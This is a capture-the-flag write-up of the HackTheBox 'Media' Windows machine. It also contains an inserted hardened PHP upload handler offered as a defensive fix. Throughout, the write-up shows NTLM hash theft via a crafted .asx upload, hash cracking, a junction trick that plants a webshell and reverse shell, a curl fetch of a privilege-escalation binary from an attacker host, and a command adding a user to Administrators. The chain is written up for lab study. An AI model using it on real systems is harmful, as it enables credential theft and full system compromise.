Back with a new writeup
Overview:
Media is a Medium-difficulty Windows machine from HackTheBox (VulnLab) running an Apache XAMPP stack with a custom PHP web application. The file upload functionality can be abused to leak an NTLMv2 hash, which can be cracked to obtain credentials and gain initial access via SSH.
Afterward, analyzing the application’s source code reveals the upload storage path, enabling an NTFS Junction attack to upload a malicious PHP web shell and achieve RCE. Finally, privilege escalation is achieved by abusing SeTcbPrivilege or regaining SeImpersonate to elevate privileges to NT AUTHORITY\SYSTEM.
Enumeration
RustScan-Nmap
Let’s start the enumeration:
Enum Http/80
I started by enumerating the web page.
As shown in the screenshot above, the page lets us upload video files, so I figured that it might be an NTLM relay attack. I then used ntlm_theft to generate a malicious file with the .asx extension:
.asx – via Windows Media Player playlist (Better, primary open)
python3 tools/ntlm_theft.py -g asx -s 10.10.14.115 --filename shell
Next, I started Responder to capture the hash:
sudo responder -I tun0 -dwv
Then I uploaded the file:
And suiii, we did it.
Now we have the NTLMv2 hash for enox, so let's run hashcat to crack it:
hashcat -m 5600 ntlmv2 /usr/share/wordlists/rockyou.txt
Nice, now we have user credentials: enox:1234virus@. We can try logging in using SSH or RDP.
I managed to gain a foothold using SSH and captured the user.txt flag.
Lateral Movement
We can start enumerating the target with the web application's source directory, looking for hard-coded credentials or other secrets that may be readable.
First, I reviewed index.php:
<?php
error_reporting(0);
// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
    $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
    $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
    $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);
    // Create a folder name using the MD5 hash of Firstname + Lastname + Email
    $folderName = md5($firstname . $lastname . $email);
    // Create the full upload directory path
    $targetDir = $uploadDir . $folderName . '/';
    // Ensure the directory exists; create it if not
    if (!file_exists($targetDir)) {
        mkdir($targetDir, 0777, true);
    }
    // Sanitize the filename to remove unsafe characters
    $originalFilename = $_FILES["fileToUpload"]["name"];
    $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);
    // Build the full path to the target file
    $targetFile = $targetDir . $sanitizedFilename;
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
        echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";
        // Update the todo.txt file
        $todoFile = $uploadDir . 'todo.txt';
        $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";
        // Append the new line to the file
        file_put_contents($todoFile, $todoContent, FILE_APPEND);
    } else {
        echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
    }
}
?>
From the source code, we can extract two important details: the base upload directory and the logic used to generate the per-upload folder name. The application stores uploaded files under the following directory:
$uploadDir = 'C:/Windows/Tasks/Uploads/';
$folderName = md5($firstname . $lastname . $email);
This means that each submission's files are stored inside a folder whose name is the MD5 hash of the concatenated first name, last name, and email address. Because those inputs are ours, we can compute the same MD5 hash, predict the exact folder name, and verify it against the directory where the uploaded files land.
Arbitrary File Write to RCE via Junction
1) Upload Webshell
We can see the folder f323599927054a9351e0927d6002b64b in the Uploads directory:
After removing that directory, let's replace it with a junction pointing at the web root:
mklink /J C:\Windows\Tasks\Uploads\f323599927054a9351e0927d6002b64b C:\xampp\htdocs
Now I'll upload the webshell and check whether the link worked:
Now let's upload a reverse shell using this webshell:
And it worked:
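The two weaknesses used above are the predictable MD5 folder name and the fact that the handler writes wherever that folder resolves, even after it has been swapped for a junction into C:\xampp\htdocs. The following hardened handler is an added example, not the Media application's code: it keeps the original form fields and base directory so it maps onto index.php, but generates an unpredictable folder name, refuses any extension or sniffed MIME type outside a video allowlist (so playlist files such as .asx are rejected too), and checks that the resolved target directory still sits under the upload root before writing. That last check assumes realpath() resolves the junction, which PHP's Windows build does for reparse points.

```php
<?php
// Hardened replacement for the upload handler shown above (added example, not the
// Media application's code). Form fields and base directory match the original;
// everything else is new.
declare(strict_types=1);

const UPLOAD_ROOT  = 'C:/Windows/Tasks/Uploads/';
const ALLOWED_EXT  = ['mp4', 'webm', 'mov'];                       // video only: .asx and .php never pass
const ALLOWED_MIME = ['video/mp4', 'video/webm', 'video/quicktime'];
const MAX_BYTES    = 200 * 1024 * 1024;

// Resolve a directory and normalise it to forward slashes with a trailing slash,
// so a prefix comparison is exact. Returns null if the path does not exist.
function canonicalDir(string $dir): ?string
{
    $real = realpath($dir);
    if ($real === false) {
        return null;
    }
    return rtrim(str_replace('\\', '/', $real), '/') . '/';
}

// The junction attack swaps a folder under the upload root for a link elsewhere.
// Assumption: realpath() follows the junction, so the resolved directory is
// compared against the resolved root before anything is written into it.
function isInsideRoot(string $dir, string $root): bool
{
    $real = canonicalDir($dir);
    return $real !== null && strncmp($real, $root, strlen($root)) === 0;
}

// Validate by size, extension allowlist and sniffed MIME type (never the
// client-supplied type). Returns the extension to store with, or null to reject.
function validateUpload(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        return null;
    }
    return $ext;
}

function handleUpload(array $post, array $files): string
{
    $root = canonicalDir(UPLOAD_ROOT);
    if ($root === null) {
        return 'Upload storage unavailable';
    }
    if (!isset($files['fileToUpload'])) {
        return 'No file supplied';
    }
    $ext = validateUpload($files['fileToUpload']);
    if ($ext === null) {
        return 'Only video files are accepted';
    }

    // Random folder instead of md5(firstname . lastname . email): a submitter cannot
    // precompute the name, so cannot pre-create or replace it with a junction.
    $folder    = bin2hex(random_bytes(16));
    $targetDir = $root . $folder . '/';
    if (!mkdir($targetDir, 0700)) {                // no recursive create, no 0777
        return 'Could not create storage';
    }
    if (!isInsideRoot($targetDir, $root)) {        // resolves outside the root: refuse
        return 'Storage path rejected';
    }

    // Stored filename is generated; the original name only goes to the log.
    $storedName = bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($files['fileToUpload']['tmp_name'], $targetDir . $storedName)) {
        return 'Upload failed';
    }

    // Log as JSON rather than interpolating raw input into a line-oriented file.
    $entry = json_encode([
        'original' => $files['fileToUpload']['name'],
        'folder'   => $folder,
        'email'    => filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL) ?: null,
    ]) . "\n";
    file_put_contents($root . 'todo.txt', $entry, FILE_APPEND | LOCK_EX);
    return 'Your application was successfully submitted';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $message = handleUpload($_POST, $_FILES);
    echo '<script>alert(' . json_encode($message) . ');</script>';
}
```

The code check is defence in depth, not the primary fix: the attack in this writeup was carried out by a local user who could delete and re-create a folder under C:\Windows\Tasks\Uploads, so moving the upload root out of a location writable by low-privileged accounts and tightening its ACLs matters more than any of the PHP-side checks. On Windows the mode argument to mkdir() is ignored, which is one more reason the ACL on the parent directory has to do the work.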
Privilege Escalation
After checking our privileges, we found SeTcbPrivilege:
SeTcbPrivilege
It is a Windows privilege that allows a process or user to operate as part of the OS.
With this privilege, a process can impersonate users, create tokens, and perform highly sensitive system-level actions.
It is one of the most powerful privileges in Windows and is rarely granted because it can lead to full system compromise if abused.
This privilege can be leveraged for privilege escalation using the technique described at https://github.com/b4lisong/SeTcbPrivilege-Abuse
I uploaded TcbElevation-x64.exe:
curl http://10.10.14.139:8000/TcbElevation-x64.exe -o TcbElevation-x64.exe
Then let's add our user enox to the Administrators group:
.\TcbElevation-x64.exe elevate "net localgroup Administrators enox /add"
Finally, we reconnect via SSH with elevated privileges to obtain the flag.